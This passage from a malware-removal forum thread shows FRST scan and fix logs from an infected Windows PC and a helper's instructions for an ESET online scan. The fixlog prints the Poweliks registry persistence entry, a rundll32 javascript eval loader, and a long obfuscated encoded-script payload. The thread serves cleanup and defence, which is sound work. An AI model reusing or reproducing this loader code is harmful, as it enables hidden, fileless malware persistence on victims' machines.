FF HKLM\...\Firefox\Extensions: [{6904342A-8307-11DF-A508-4AE2DFD72085}] - C:\Program Files\DivX\DivX Plus Web Player\firefox\wpa
FF Extension: DivX HiQ - C:\Program Files\DivX\DivX Plus Web Player\firefox\wpa [2011-05-06]
FF HKLM\...\Firefox\Extensions: [{1E73965B-8B48-48be-9C8D-68B920ABC1C4}] - C:\Program Files\AVG\AVG2012\Firefox4
FF Extension: AVG Safe Search - C:\Program Files\AVG\AVG2012\Firefox4 [2011-12-03]
FF HKLM\...\Firefox\Extensions: [{F53C93F1-07D5-430c-86D4-C9531B27DFAF}] - C:\Program Files\AVG\AVG2012\Firefox\DoNotTrack
FF Extension: AVG Do Not Track - C:\Program Files\AVG\AVG2012\Firefox\DoNotTrack [2012-05-15]
FF HKLM\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - C:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension
FF Extension: Microsoft .NET Framework Assistant - C:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension [2013-12-23]

Chrome:
=======
CHR HomePage:
CHR Plugin: (Shockwave Flash) - C:\Program Files\Google\Chrome\Application\34.0.1847.116\PepperFlash\pepflashplayer.dll No File
CHR Plugin: (Chrome Remote Desktop Viewer) - internal-remoting-viewer
CHR Plugin: (Native Client) - C:\Program Files\Google\Chrome\Application\34.0.1847.116\ppGoogleNaClPluginChrome.dll No File
CHR Plugin: (Chrome PDF Viewer) - C:\Program Files\Google\Chrome\Application\34.0.1847.116\pdf.dll No File
CHR Plugin: (AVG Internet Security) - C:\Users\MikeandBert\AppData\Local\Google\Chrome\User Data\Default\Extensions\jmfkcklnlgedgbglfkkgedjfmejoahla\12.0.0.2210_0\plugins/avgnpss.dll (AVG Technologies CZ, s.r.o.)
CHR Plugin: (Adobe Acrobat) - C:\Program Files\Adobe\Reader 10.0\Reader\Browser\nppdf32.dll (Adobe Systems Inc.)
CHR Plugin: (Java Deployment Toolkit 6.0.260.3) - C:\Program Files\Java\jre6\bin\new_plugin\npdeployJava1.dll (Sun Microsystems, Inc.)
CHR Plugin: (Java™ Platform SE 6 U26) - C:\Program Files\Java\jre6\bin\new_plugin\npjp2.dll (Sun Microsystems, Inc.)
CHR Plugin: (QuickTime Plug-in 7.7.2) - C:\Program Files\QuickTime\plugins\npqtplugin.dll (Apple Inc.)
CHR Plugin: (QuickTime Plug-in 7.7.2) - C:\Program Files\QuickTime\plugins\npqtplugin2.dll (Apple Inc.)
CHR Plugin: (QuickTime Plug-in 7.7.2) - C:\Program Files\QuickTime\plugins\npqtplugin3.dll (Apple Inc.)
CHR Plugin: (QuickTime Plug-in 7.7.2) - C:\Program Files\QuickTime\plugins\npqtplugin4.dll (Apple Inc.)
CHR Plugin: (QuickTime Plug-in 7.7.2) - C:\Program Files\QuickTime\plugins\npqtplugin5.dll (Apple Inc.)
CHR Plugin: (QuickTime Plug-in 7.7.2) - C:\Program Files\QuickTime\plugins\npqtplugin6.dll (Apple Inc.)
CHR Plugin: (QuickTime Plug-in 7.7.2) - C:\Program Files\QuickTime\plugins\npqtplugin7.dll (Apple Inc.)
CHR Plugin: (npFFApi) - C:\Program Files\CheckPoint\ZAForceField\TrustChecker\bin\npFFApi.dll No File
CHR Plugin: (DivX VOD Helper Plug-in) - C:\Program Files\DivX\DivX OVS Helper\npovshelper.dll (DivX, LLC.)
CHR Plugin: (DivX Web Player) - C:\Program Files\DivX\DivX Plus Web Player\npdivx32.dll (DivX, LLC)
CHR Plugin: (Google Earth Plugin) - C:\Program Files\Google\Google Earth\plugin\npgeplugin.dll (Google)
CHR Plugin: (Google Update) - C:\Program Files\Google\Update\1.3.21.124\npGoogleUpdate3.dll No File
CHR Plugin: (Silverlight Plug-In) - C:\Program Files\Microsoft Silverlight\4.0.60831.0\npctrl.dll ( Microsoft Corporation)
CHR Plugin: (iTunes Application Detector) - C:\Program Files\iTunes\Mozilla Plugins\npitunes.dll ()
CHR Plugin: (Unity Player) - C:\Users\MikeandBert\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll No File
CHR Plugin: (Windows Presentation Foundation) - C:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll (Microsoft Corporation)
CHR Plugin: (Shockwave Flash) - C:\Windows\system32\Macromed\Flash\NPSWF32_11_5_502_110.dll No File
CHR Extension: (Google Drive) - C:\Users\MikeandBert\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2012-12-27]
CHR Extension: (YouTube) - C:\Users\MikeandBert\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2012-12-27]
CHR Extension: (Google Search) - C:\Users\MikeandBert\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2012-12-27]
CHR Extension: (DivX HiQ) - C:\Users\MikeandBert\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnjbmmemklcjgepojigaapkoodmkgbae [2012-12-27]
CHR Extension: (AVG Safe Search) - C:\Users\MikeandBert\AppData\Local\Google\Chrome\User Data\Default\Extensions\jmfkcklnlgedgbglfkkgedjfmejoahla [2012-12-27]
CHR Extension: (FBPHOTOZOOM) - C:\Users\MikeandBert\AppData\Local\Google\Chrome\User Data\Default\Extensions\mpieaakhacmfleokhjcjnpcnmnmpfkid [2012-12-27]
CHR Extension: (AVG Do Not Track) - C:\Users\MikeandBert\AppData\Local\Google\Chrome\User Data\Default\Extensions\ndibdjnfmopecpmkdieinmbadjfpblof [2012-12-27]
CHR Extension: (DivX Plus Web Player HTML5 video) - C:\Users\MikeandBert\AppData\Local\Google\Chrome\User Data\Default\Extensions\nneajnkjbffgblleaoojgaacokifdkhm [2012-12-27]
CHR Extension: (Gmail) - C:\Users\MikeandBert\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2012-12-27]
CHR HKLM\...\Chrome\Extension: [fnjbmmemklcjgepojigaapkoodmkgbae] - C:\Program Files\DivX\DivX Plus Web Player\google_chrome\wpa\wpa.crx [2011-02-07]
CHR HKLM\...\Chrome\Extension: [jmfkcklnlgedgbglfkkgedjfmejoahla] - C:\Program Files\AVG\AVG2012\Chrome\safesearch.crx [2012-07-26]
CHR HKLM\...\Chrome\Extension: [knkakpihealnpggeceajhaonlmgdkaip] - C:\Users\MIKEAN~1\AppData\Local\Temp\tbch.crx [2012-07-26]
CHR HKLM\...\Chrome\Extension: [mpieaakhacmfleokhjcjnpcnmnmpfkid] - C:\Program Files\fbphotozoom\fbphotozoom16.crx [2012-04-05]
CHR HKLM\...\Chrome\Extension: [ndibdjnfmopecpmkdieinmbadjfpblof] - C:\Program Files\AVG\AVG2012\Chrome\donottrack.crx [2012-04-20]
CHR HKLM\...\Chrome\Extension: [nneajnkjbffgblleaoojgaacokifdkhm] - C:\Program Files\DivX\DivX Plus Web Player\google_chrome\html5video\html5video.crx [2011-02-07]

========================== Services (Whitelisted) =================

R2 AVGIDSAgent; C:\Program Files\AVG\AVG2012\AVGIDSAgent.exe [5175856 2013-10-16] (AVG Technologies CZ, s.r.o.)
R2 avgwd; C:\Program Files\AVG\AVG2012\avgwdsvc.exe [193288 2012-02-14] (AVG Technologies CZ, s.r.o.)
S4 GameConsoleService; C:\Program Files\eMachines Games\eMachines Game Console\GameConsoleService.exe [165416 2008-05-05] (WildTangent, Inc.)
S3 IDriverT; C:\Program Files\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe [69632 2005-04-04] (Macrovision Corporation) [File not signed]
R2 MsMpSvc; C:\Program Files\Microsoft Security Client\Antimalware\MsMpEng.exe [11736 2011-04-27] (Microsoft Corporation)
R3 NisSrv; C:\Program Files\Microsoft Security Client\Antimalware\NisSrv.exe [208944 2011-04-27] (Microsoft Corporation)

==================== Drivers (Whitelisted) ====================

R3 AVGIDSDriver; C:\Windows\System32\DRIVERS\avgidsdriverx.sys [142176 2012-12-10] (AVG Technologies CZ, s.r.o. )
R3 AVGIDSFilter; C:\Windows\System32\DRIVERS\avgidsfilterx.sys [24144 2011-12-23] (AVG Technologies CZ, s.r.o. )
R0 AVGIDSHX; C:\Windows\System32\DRIVERS\avgidshx.sys [24896 2012-04-19] (AVG Technologies CZ, s.r.o. )
R3 AVGIDSShim; C:\Windows\System32\DRIVERS\avgidsshimx.sys [17232 2011-12-23] (AVG Technologies CZ, s.r.o. )
R1 Avgldx86; C:\Windows\System32\DRIVERS\avgldx86.sys [250080 2012-11-08] (AVG Technologies CZ, s.r.o.)
R1 Avgmfx86; C:\Windows\System32\DRIVERS\avgmfx86.sys [41040 2011-12-23] (AVG Technologies CZ, s.r.o.)
R0 Avgrkx86; C:\Windows\System32\DRIVERS\avgrkx86.sys [31952 2012-01-31] (AVG Technologies CZ, s.r.o.)
R1 Avgtdix; C:\Windows\System32\DRIVERS\avgtdix.sys [302368 2013-04-11] (AVG Technologies CZ, s.r.o.)
S3 BVRPMPR5; C:\Windows\system32\drivers\BVRPMPR5.SYS [49904 2010-11-03] (Avanquest Software) [File not signed]
R0 gfibto; C:\Windows\System32\drivers\gfibto.sys [13560 2012-12-02] (GFI Software)
R1 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [165648 2011-04-18] (Microsoft Corporation)
R3 MpNWMon; C:\Windows\System32\DRIVERS\MpNWMon.sys [43392 2011-04-18] (Microsoft Corporation)
S3 V0415Vid; C:\Windows\System32\DRIVERS\V0415Vid.sys [286208 2009-08-03] (Creative Technology Ltd.)
U5 AppMgmt; C:\Windows\system32\svchost.exe [21504 2008-01-20] (Microsoft Corporation)
S3 catchme; \??\C:\Users\MIKEAN~1\AppData\Local\Temp\catchme.sys [X]
S1 CSN5PDTS82; System32\Drivers\CSN5PDTS82.sys [X]
S1 CSN5PDTS82x64; System32\Drivers\CSN5PDTS82x64.sys [X]
S1 dcohjryh; \??\C:\Windows\system32\drivers\dcohjryh.sys [X]
S3 IpInIp; system32\DRIVERS\ipinip.sys [X]
S3 NwlnkFlt; system32\DRIVERS\nwlnkflt.sys [X]
S3 NwlnkFwd; system32\DRIVERS\nwlnkfwd.sys [X]

==================== NetSvcs (Whitelisted) ===================

==================== One Month Created Files and Folders ========

2014-07-20 15:24 - 2014-07-20 15:24 - 00044892 _____ () C:\ComboFix.txt
2014-07-20 14:38 - 2011-06-25 23:45 - 00256000 _____ () C:\Windows\PEV.exe
2014-07-20 14:38 - 2010-11-07 10:20 - 00208896 _____ () C:\Windows\MBR.exe
2014-07-20 14:38 - 2009-04-19 21:56 - 00060416 _____ (NirSoft) C:\Windows\NIRCMD.exe
2014-07-20 14:38 - 2000-08-30 17:00 - 00518144 _____ (SteelWerX) C:\Windows\SWREG.exe
2014-07-20 14:38 - 2000-08-30 17:00 - 00406528 _____ (SteelWerX) C:\Windows\SWSC.exe
2014-07-20 14:38 - 2000-08-30 17:00 - 00098816 _____ () C:\Windows\sed.exe
2014-07-20 14:38 - 2000-08-30 17:00 - 00080412 _____ () C:\Windows\grep.exe
2014-07-20 14:38 - 2000-08-30 17:00 - 00068096 _____ () C:\Windows\zip.exe
2014-07-20 14:25 - 2014-07-20 15:24 - 00000000 ____D () C:\Qoobox
2014-07-20 14:23 - 2014-07-20 15:22 - 00000000 ____D () C:\Windows\erdnt
2014-07-19 19:17 - 2014-07-19 19:17 - 00002341 _____ () C:\Users\MikeandBert\Desktop\Multiple dllhost.exe-Com Surrogate processes running - Virus, Trojan, Spyware, and Malware Removal Logs.url
2014-07-19 15:19 - 2014-07-19 15:19 - 00000000 ____D () C:\Windows\Temp965A39F0-D8D4-45F9-AB4E-7BAA80C34227-Signatures
2014-07-19 14:55 - 2014-07-21 08:07 - 00000000 ____D () C:\FRST
2014-07-19 14:52 - 2014-07-21 08:06 - 00000000 ____D () C:\Users\MikeandBert\Desktop\com fix
2014-07-08 22:44 - 2014-06-06 17:19 - 02051072 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2014-07-08 22:44 - 2014-06-06 17:05 - 12353024 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2014-07-08 22:44 - 2014-06-06 16:25 - 09711616 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2014-07-08 22:44 - 2014-06-06 16:12 - 01810432 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2014-07-08 22:44 - 2014-06-06 16:04 - 01106432 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2014-07-08 22:44 - 2014-06-06 16:03 - 01427968 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2014-07-08 22:44 - 2014-06-06 16:02 - 01129472 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2014-07-08 22:44 - 2014-06-06 16:00 - 00231936 _____ (Microsoft Corporation) C:\Windows\system32\url.dll
2014-07-08 22:44 - 2014-06-06 15:58 - 00065024 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2014-07-08 22:44 - 2014-06-06 15:57 - 00142848 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2014-07-08 22:44 - 2014-06-06 15:56 - 00717824 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2014-07-08 22:44 - 2014-06-06 15:56 - 00421376 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2014-07-08 22:44 - 2014-06-06 15:54 - 00607744 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2014-07-08 22:44 - 2014-06-06 15:54 - 00353792 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2014-07-08 22:44 - 2014-06-06 15:54 - 00223232 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2014-07-08 22:44 - 2014-06-06 15:54 - 00041472 _____ (Microsoft Corporation) C:\Windows\system32\msfeedsbs.dll
2014-07-08 22:44 - 2014-06-06 15:53 - 01796096 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2014-07-08 22:44 - 2014-06-06 15:53 - 00073728 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2014-07-08 22:44 - 2014-06-06 15:53 - 00010752 _____ (Microsoft Corporation) C:\Windows\system32\msfeedssync.exe
2014-07-08 22:44 - 2014-06-06 15:52 - 02382848 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2014-07-08 22:44 - 2014-06-06 15:51 - 00011776 _____ (Microsoft Corporation) C:\Windows\system32\mshta.exe
2014-07-08 22:44 - 2014-06-06 15:47 - 00176640 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2014-07-08 22:44 - 2014-06-06 01:59 - 00506880 _____ (Microsoft Corporation) C:\Windows\system32\qedit.dll
2014-07-08 22:44 - 2014-05-29 23:53 - 00273408 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\afd.sys
2014-06-25 10:59 - 2014-06-25 10:59 - 00000000 ____D () C:\Users\MikeandBert\AppData\Local\Adobe

==================== One Month Modified Files and Folders =======

2014-07-21 08:07 - 2014-07-19 14:55 - 00000000 ____D () C:\FRST
2014-07-21 08:06 - 2014-07-19 14:52 - 00000000 ____D () C:\Users\MikeandBert\Desktop\com fix
2014-07-21 08:04 - 2011-11-16 02:59 - 00000892 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-07-21 08:01 - 2006-10-11 00:09 - 01826923 _____ () C:\Windows\WindowsUpdate.log
2014-07-21 07:57 - 2013-04-18 22:02 - 00065536 _____ () C:\Windows\system32\Ikeext.etl
2014-07-21 07:57 - 2008-09-04 17:48 - 00000000 ____D () C:\ProgramData\NVIDIA
2014-07-21 07:57 - 2006-11-02 06:01 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-07-21 07:57 - 2006-11-02 05:47 - 00003216 _____ () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-1.C7483456-A289-439d-8115-601632D005A0
2014-07-21 07:57 - 2006-11-02 05:47 - 00003216 _____ () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-0.C7483456-A289-439d-8115-601632D005A0
2014-07-21 07:57 - 2006-11-02 04:18 - 00000000 ____D () C:\Windows\tracing
2014-07-21 07:54 - 2006-11-02 06:01 - 00032590 _____ () C:\Windows\Tasks\SCHEDLGU.TXT
2014-07-21 07:43 - 2013-10-22 15:08 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2014-07-21 07:28 - 2011-11-16 02:59 - 00000896 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-07-20 18:32 - 2011-12-03 17:34 - 00000000 ____D () C:\Windows\system32\Drivers\AVG
2014-07-20 15:44 - 2008-01-20 19:47 - 00204214 _____ () C:\Windows\PFRO.log
2014-07-20 15:24 - 2014-07-20 15:24 - 00044892 _____ () C:\ComboFix.txt
2014-07-20 15:24 - 2014-07-20 14:25 - 00000000 ____D () C:\Qoobox
2014-07-20 15:24 - 2006-11-02 04:18 - 00000000 ___RD () C:\Users\Public
2014-07-20 15:24 - 2006-11-02 04:18 - 00000000 ___RD () C:\Users\Default
2014-07-20 15:22 - 2014-07-20 14:23 - 00000000 ____D () C:\Windows\erdnt
2014-07-20 15:21 - 2006-11-02 03:23 - 00000215 _____ () C:\Windows\system.ini
2014-07-20 15:08 - 2010-02-01 11:54 - 00000000 ____D () C:\ProgramData\TEMP
2014-07-19 19:17 - 2014-07-19 19:17 - 00002341 _____ () C:\Users\MikeandBert\Desktop\Multiple dllhost.exe-Com Surrogate processes running - Virus, Trojan, Spyware, and Malware Removal Logs.url
2014-07-19 15:33 - 2011-09-08 03:05 - 00002106 _____ () C:\Windows\epplauncher.mif
2014-07-19 15:19 - 2014-07-19 15:19 - 00000000 ____D () C:\Windows\Temp965A39F0-D8D4-45F9-AB4E-7BAA80C34227-Signatures
2014-07-17 23:53 - 2006-11-02 03:33 - 00762234 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-07-09 03:25 - 2006-11-02 05:47 - 00379856 _____ () C:\Windows\system32\FNTCACHE.DAT
2014-07-09 03:21 - 2006-11-02 05:37 - 00000000 ____D () C:\Program Files\Windows Journal
2014-07-09 03:05 - 2013-08-14 03:14 - 00000000 ____D () C:\Windows\system32\MRT
2014-07-09 03:02 - 2006-11-02 03:24 - 93585272 _____ (Microsoft Corporation) C:\Windows\system32\mrt.exe
2014-07-08 11:28 - 2012-06-14 08:08 - 00699056 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerApp.exe
2014-07-08 11:28 - 2011-10-16 04:39 - 00071344 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerCPLApp.cpl
2014-07-08 06:20 - 2012-07-07 15:31 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Drive
2014-06-26 13:55 - 2014-05-03 14:30 - 00000000 ____D () C:\Users\MikeandBert\AppData\Roaming\Nikon
2014-06-26 13:55 - 2013-09-17 06:24 - 00000020 ____H () C:\ProgramData\PKP_DLev.DAT
2014-06-26 13:51 - 2013-05-24 19:59 - 00000000 ____D () C:\Users\MikeandBert\Desktop\bert
2014-06-25 10:59 - 2014-06-25 10:59 - 00000000 ____D () C:\Users\MikeandBert\AppData\Local\Adobe
2014-06-23 15:40 - 2009-04-09 11:34 - 00000000 ____D () C:\Users\MikeandBert\Desktop\Mike

Files to move or delete:
====================
C:\ProgramData\hash.dat

==================== Bamital & volsnap Check =================

C:\Windows\explorer.exe => File is digitally signed
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2014-07-21 08:10

==================== End Of Log ============================



#8 aharonov

aharonov

  • Malware Response Team
  • 2,441 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:01:18 AM

Posted 22 July 2014 - 01:57 AM

That's great to hear!
Can you please also post up the fixlog that FRST has created? You can find it as fixlog.txt in the same directory as your frst.exe is saved to.

Let's do a check up:


Please download the ESET Online Scanner and save it to your Desktop.
  • Disable the realtime-protection of your antivirus and anti-malware programs because they might interfere with the scan.
  • Start esetsmartinstaller_enu.exe with administartor privileges.
  • Select the option Yes, I accept the Terms of Use and click on Start.
  • Make sure that the option Remove found threats is NOT checked, and the option Scan archives is checked.
  • Now click on Advanced Settings and select the following:
    • Scan for potentially unwanted applications
    • Scan for potentially unsafe applications
    • Enable Anti-Stealth Technology
  • Click on Start. The virus signature database will begin to download. This may take some time.
  • When completed the Online Scan will begin automatically.
    Note: This scan might take a long time! Please be patient.
  • When completed select Uninstall application on close if you so wish, but make sure you copy the logfile first!
  • Now click on Finish
  • A log file is created at C:\Program Files\ESET\EsetOnlineScanner\log.txt.
    Copy and paste the content of this log file in your next reply.
Note: Do not forget to re-enable your antivirus application after running the above scan!

#9 mcgrotty

mcgrotty
  • Topic Starter

  • Members
  • 5 posts
  • OFFLINE
  •  
  • Local time:04:18 PM

Posted 23 July 2014 - 04:16 AM

Whoops. I ran it and forgot to post the logs.

 

Fixlog:

 

Fix result of Farbar Recovery Tool (FRST written by Farbar) (x86) Version:20-07-2014
Ran by MikeandBert at 2014-07-21 07:51:44 Run:1
Running from C:\Users\MikeandBert\Desktop\com fix
Boot Mode: Normal

==============================================

Content of fixlist:
*****************
REG: reg query "HKU\S-1-5-21-165418536-3136176592-1450045568-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" /s
HKU\S-1-5-21-165418536-3136176592-1450045568-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplica (the data entry has 289 more characters). <==== Poweliks!
SearchScopes: HKLM - {bbbf3d02-0068-423f-8c68-0fd1c6e50b38} URL = http://search.tb.ask.com/search/GGmain.jhtml?p2=^AW6^xdm003^YYA^us&si=CMS-0uq3jL8CFYpefgodSKIAuQ&ptb=076451AA-4DB5-4C8B-83DA-61CCA08D46B3&ind=2014062122&n=780c262a&psa=&st=sb&searchfor={searchTerms}
SearchScopes: HKCU - {bbbf3d02-0068-423f-8c68-0fd1c6e50b38} URL = http://search.tb.ask.com/search/GGmain.jhtml?p2=^AW6^xdm003^YYA^us&si=CMS-0uq3jL8CFYpefgodSKIAuQ&ptb=076451AA-4DB5-4C8B-83DA-61CCA08D46B3&ind=2014062122&n=780c262a&psa=&st=sb&searchfor={searchTerms}
AlternateDataStreams: C:\ProgramData\TEMP:359B3BDA
AlternateDataStreams: C:\ProgramData\TEMP:430C6D84
AlternateDataStreams: C:\ProgramData\TEMP:9A870F8B
AlternateDataStreams: C:\ProgramData\TEMP:A8ADE5D8
AlternateDataStreams: C:\ProgramData\TEMP:C7DEC6B7
AlternateDataStreams: C:\ProgramData\TEMP:DFC5A2B2
Reboot:

*****************

========= reg query "HKU\S-1-5-21-165418536-3136176592-1450045568-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" /s =========

HKEY_USERS\S-1-5-21-165418536-3136176592-1450045568-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32
    (Default)    REG_SZ    rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktdsjqu/fodpef?(,)ofx!BdujwfYPckfdu)(XTdsjqu/Tifmm(**/SfhSfbe)(ILDV]]tpguxbsf]]dmbttft]]dmtje]]|bc9:13c5.1:db.5cc7.c89e.b9g6:18:b9e6~]]mpdbmtfswfs43]]b(*,(=0tdsjqu?(*".replace(/./g,function(_){return%20String.fromCharCode(_.charCodeAt()-1);}))
    a    REG_SZ    #@~^OXcAAA==n{F+2im'xh,)mDk-+or8%mYvEUmDb2ORUtVsJbIStrVc+e'*+* Y.zPhxlc3XwC NAx\bDKU:xO?DDrUT/`rYhbxNb.YJ*ia'A_Ew'/z/Dn:2 wwSkx[GS/2WSnM/4V^--7FcT-'wGhDd4VVcn6Ji6xU+SPzmOk-nor8L^YvJj^MkwOr o sbs?zkY:r(L^Yr#I0!x^ObWx,^N `#PO.XPDY;DU~mR]+T]+mNcE_|S\w'/G0DAmDn'-skmMWkG0D-wxY~WMl:AWM3PknOEa-'x[www7  !cX!F {w'/wEbp8^lD^4`n* M+Y!D ~!p8N0!x^ObWx,[`!# XxU+SPzmOk-nor8L^YvJ\dX:V+ U+.\.oHJ_K:nR+RZE#p6 Wa+UcrM2:E~!~0msd+*iXRd+U[v#IE6U'mR3aalx[3 \rDKUs+UD?DDk okcJuYn:a]wwr#_! /!4/D.rxT`!RsldO&x[+X60vJ&E*_FbI!0UY{;6xQrRD:wri!WY{0 ZM+COK+XOsbV+v;WxD~DD;+SR8#Ik6cE6Yb`!0Y  MkO+vacDnkwKx/AK[X*i;0DR/sK/+vbi!0'6 /DlD+P+aOwks+v;0 ~O.!+#I;6Yx0c!YobV`E6xDbi!0d'!0O }w+ )/:+6DjODls`bi;WkR]+m[`y#I;6R.rD+cE6dcInmNvE0DRUryO+#*i;WkRZ^G/`#p;WR;VK/n`bI6R9+^nYsrs`EWUD#Ilc]!xcr-rJ_!0 QJ'J~z$ErnDPz GD/Ym.OJB!BFbiW G+s+DnsbVnc!0xbI)8Atbs`Z6RwkV2Xr/D/cw*#`r6`m9U`*''Zb`NvJr#I8[crtOYalzJNGA VWC[c:rmMGkWWDR1W:JNKAx^WCNJb&{J*zz{*~Z!8{Rv2ZAO*G9 %obWRbwAX/yFA)/lc&bU9WAkvc!OnAO%O&TOX% s/Erbi)`lc3U\bDKxh+UOvJKDK^+k/Eb*`JCE*'Eka,`,:+XYRAx1GNbxLT=))j;qqc!+D?YMrUov$;WU\n.DTl)w.WsACdvcjOMkUovv9CBl+y}F(:gTlq,;qVNVn8At1hsDqZ48iMwXIqV[!jXFs~-myVTCq,EKPz/Pw;\MoZ429*h?"im .s|j!L 8I*1!.((.ZLBs~t1:oYtp"V^xtd8A4^ssYtp"V^k4}(&HaNVV\(LZa|j!L8IX^V.N&/IU}("q^:lj($VK#D8 ^V(U3{BwI*^!jZ[^d\M#HnjYA1C~34yF4lq*[6Nwf9p9H}lT]MOYIsEJV"Vt:^;}`IX8ssYC gA^&gs(Bk+UoW::jfS`,rls.%[;AKp1Z}Z;i:j:(M#L[!^\8kl$m21s8q9/nilt8`G&VB^}s6VI&"s}AIs4V.UeoIV&r3aSsDPn(g!\TEihj:8Mj%NVV-8b*s8 ^!J3w"1 #D5s6*5xj24VIsm0s%ey.y1q!+rVxq8k0E"M#:C lV]C^;5qF2eZF\tuj/t?TrUXg}qF\1x^H4yIq4VjrJ;I:I 6.}?0;]Mj:mXV#u^ht?TrN;qd(01/epgyJs~qI:aa5H6K\wd}qpdpq*"C`1/Ip1.S2wq[MOf(Moy^z&/ FgXm2Is8U*1[ X!Cg41&]A}q6V\ wT}j!2rHIinoAV5U.a4M"s^kl2\tw8hjf8 l"N_9qe2I\^rTkiV"P1M#Nlqs/::wO}U6(lqIs} VKm mkjCjr8M^L&ka4if^y[MjOS^9sts6Vef"w8 W;5 ok4VVE\!g-4 }s4 I28y*yoPW+j&"48:"t1:}/Bo~t^:wO}oIs^ HwJsgV[2^O1Ma^4q.E9MwTlq,;Is64t2HW&s984x"28`/:oEe 9VtZ&2rHIinoAV}Ujw8M"s1kXA}q}w(:jH}oIG4ypG(0VE9h,M}?&d(V~FI:awezXqC"sp VPCqm/Phj&i X-9Zaqlo9!9wdqbhVjs.T[o9EjuVS}?SViMwXIqV[!jX^X0;jy.TjqFh8!jYtlTI(]a4y*M(MwUmHorj .;[VVY\j6g5l4t j3&kVG^hj![(x;q;IinoAV}Ujw8M"s1kXGms.t9Mji+oAs|;3{Wq}F(h1ZlO;(M9tF$t^hwY(Z48jVszeqFV[!jXFs~-1 sZlq,EhKzdKqs;}VsT829*hjI`mxjsF.ZoqFH!^h^EtFZL9AF-t_./tjX4iMwzIq^NV.Xns~-myVTlq,;K:2/: s!}MwT8&x*h?]j^UjVF.ZL81T^sVEtqZoBs~z( H^}_.X\?0{9w1Xm2Is8`sy1+.D5:XXK.DA1C$28+8tCl[rNw9[o9Xt l!]MOOIs!S0NV92w"my.O5s62toHWnp6olMjzt?8nI:2Vef"GBsR;Iy6-ess/}pgyt8r(CsG5q1W\?zOpq*Vq;IWJ06\I+sZlO;JVgh(Ms!F/xmpZ&2H!apU*s^pjt8CtG&VHlm2IV(?lV4Vhr|o!{Bw.E1+ss}jl4[M^ \jqV[!4\tCt19w1X^2IV8iwy^ jOI:alS0NV9s"XmVjGq0F2e29\1+,sNZlpCWytkX.8Ugtt:j65oI2[s.1tp"W8 ""&kVFms.!9(x;q;I#4 14ts.rIpIaN:jHt("W( ]yJV9V[28sNVt-t;ok]+j!iCx-I!o0}_9V1&tr|U*B4 }-CyjWx!*84MSd}Z44`&sy[!jYJVxq4 I28qjEj l!t(x-1sH^m }wI j"S0t44sIdtj9V\s!KK:jfJjOkm:#L[/~Kn(gT}q!;i .E[!^Yt?lB(x]^ms,h` jzNsV%}oH;jVsE\!6^j:jhFZ4r\(^YP+x;tgTqAV;[wA!^r0/Bsj;1 os}`*t9M^+}`FsNVt-t_HE"+.ZKjTCMO3nZBCtp"18 "q4V.(eq*38!`kF?lB(xt7lyjWxMlq4Vhdp;oVPq,39 6^|?02F?S3`CB\e+j3[(xs|U3{WjYZnp"V 